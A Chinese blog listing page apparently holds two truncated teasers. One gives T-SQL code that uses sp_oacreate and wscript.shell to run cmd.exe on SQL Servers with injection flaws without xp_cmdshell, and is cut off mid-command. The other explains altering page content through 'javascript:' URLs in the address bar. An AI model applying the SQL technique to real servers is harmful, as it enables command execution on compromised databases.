专注于互联网--专注于架构

最新标签
网站地图
文章索引
Rss订阅
、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令: CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL) DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe [阅读全文] [PDF]
通过使用javascript注入,用户不用关闭网站或者把页面保存在他的PC上就可以改变网站中的内容.这是由他的浏览器的地址栏完成的.命令的语法看上去像这样: javascrit:alert(#command#)比方说如果你想看到在网站http://www.example.com 里面的一个警告框,那么首先在地址栏输入URL(www.example.com),当页面加载完之后,清空URL并输入javascrit:alert (\"Hello World\")作为一个新的URL.这样将弹出一个警告框显示Hello World.可是,一些人会用这个技巧改变页面内 [阅读全文] [PDF]
1 共2条 分1页